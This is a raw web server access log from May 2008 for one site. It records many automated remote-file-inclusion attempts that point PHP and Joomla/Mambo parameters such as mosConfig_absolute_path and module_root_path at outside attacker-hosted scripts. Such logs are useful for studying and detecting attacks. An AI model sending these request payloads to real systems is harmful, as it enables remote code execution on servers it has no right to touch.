91.121.1.47 - - [02/May/2008:09:36:31 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.1.47 - - [02/May/2008:09:36:31 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:36:31 -0700] "GET /logs/access_080228.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.215.223.191 - - [02/May/2008:09:36:31 -0700] "GET /logs/index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [02/May/2008:09:36:35 -0700] "GET /index.php?option=com_akocomment&task=&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/monjali/sken/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:36:43 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.154.38.121 - - [02/May/2008:09:36:49 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:36:51 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.189.203.8 - - [02/May/2008:09:36:51 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:36:51 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:36:52 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.154.38.121 - - [02/May/2008:09:36:55 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:37:02 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:37:08 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:37:09 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:37:10 -0700] "GET /logs/access_080116.log/!scanhttp://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:17 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:09:37:18 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:37:18 -0700] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:09:37:18 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:18 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:37:18 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:09:37:18 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:37:19 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.155.232.37 - - [02/May/2008:09:37:21 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:37:23 -0700] "GET /logs/access_080308.log//admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:33 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:33 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:33 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:35 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:37:35 -0700] "GET /logs/access_080116.log/!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:36 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:37:36 -0700] "GET /!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.70.234.195 - - [02/May/2008:09:37:36 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:37:38 -0700] "GET /logs/!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:37:40 -0700] "GET /logs/access_080124.log/!scanhttp://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:37:43 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:37:44 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.70.234.217 - - [02/May/2008:09:37:44 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:37:51 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:37:51 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:56 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:56 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:56 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:56 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:57 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:57 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:59 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:37:59 -0700] "GET //includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:38:00 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.92.140.30 - - [02/May/2008:09:38:02 -0700] "GET /logs/access_080308.log//codebb/lang_select?phpbb_root_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.140.30 - - [02/May/2008:09:38:02 -0700] "GET //codebb/lang_select?phpbb_root_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.92.140.30 - - [02/May/2008:09:38:03 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:38:07 -0700] "GET /logs/access.log/index.php?configFile=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [02/May/2008:09:38:11 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
198.106.204.216 - - [02/May/2008:09:38:29 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:38:29 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:38:29 -0700] "GET //appserv/main.php?appserv_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:38:29 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.153.72 - - [02/May/2008:09:38:38 -0700] "GET /logs//appserv/main.php?appserv_root=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:38:46 -0700] "GET /logs/access_080213.log/index.php?configFile=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [02/May/2008:09:38:47 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [02/May/2008:09:38:47 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [02/May/2008:09:38:49 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [02/May/2008:09:38:49 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:38:50 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:38:50 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:38:51 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:38:51 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.199.126.130 - - [02/May/2008:09:38:52 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://fairplay.ilabs.at//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:38:52 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:38:53 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:38:54 -0700] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:38:54 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:38:54 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:39:04 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.195.37.121 - - [02/May/2008:09:39:05 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
81.177.4.33 - - [02/May/2008:09:39:05 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.4.33 - - [02/May/2008:09:39:05 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.121 - - [02/May/2008:09:39:05 -0700] "GET /blog/wp-login.php?action=lostpassword HTTP/1.0" 200 1706 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.121 - - [02/May/2008:09:39:06 -0700] "GET /blog/wp-admin/wp-admin.css?version=2.3.3 HTTP/1.0" 200 19794 "http://dmulk.com/blog/wp-login.php?action=lostpassword" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
81.177.4.33 - - [02/May/2008:09:39:06 -0700] "GET /logs/access_071225.log//includes/kb_constants.php?module_root_path=http://sulawesi.us/xpl/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:39:20 -0700] "GET /logs/access_080116.log//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:39:20 -0700] "GET //includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [02/May/2008:09:39:21 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://channels.dal.net/racrew/rador.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.196.43.133 - - [02/May/2008:09:39:21 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:39:25 -0700] "GET /logs/access_080228.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:39:26 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 200 11590 "-" "libwww-perl/5.810" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:39:26 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.222.128.178 - - [02/May/2008:09:39:27 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://sulawesi.us/xpl/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:39:29 -0700] "GET /logs/access_080105.log/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:39:29 -0700] "GET /lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:39:30 -0700] "GET /logs/lib/gore.php?libpath=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.218.85.18 - - [02/May/2008:09:39:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:39:36 -0700] "GET /logs/access_080321.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.87.179.130 - - [02/May/2008:09:39:38 -0700] "GET /logs/access_080220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.113.4.81 - - [02/May/2008:09:39:39 -0700] "GET /logs/access_080128.log/akocomments.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.87.179.130 - - [02/May/2008:09:39:40 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.87.179.130 - - [02/May/2008:09:39:44 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.58.22 - - [02/May/2008:09:40:03 -0700] "GET /logs//includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [02/May/2008:09:40:03 -0700] "GET //includes/kb_constants.php?module_root_path=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.3 - - [02/May/2008:09:40:12 -0700] "GET /logs/access_080116.log/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://finkel.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:40:12 -0700] "GET /logs/access_080127.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:40:19 -0700] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.234.133.173 - - [02/May/2008:09:40:20 -0700] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://walasri.com/data/menu/file/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:40:39 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:40:42 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 200 11590 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.79.151 - - [02/May/2008:09:40:42 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:40:46 -0700] "GET /logs/access_080228.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:40:52 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [02/May/2008:09:40:53 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.2knowit.net/administrator/modules/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
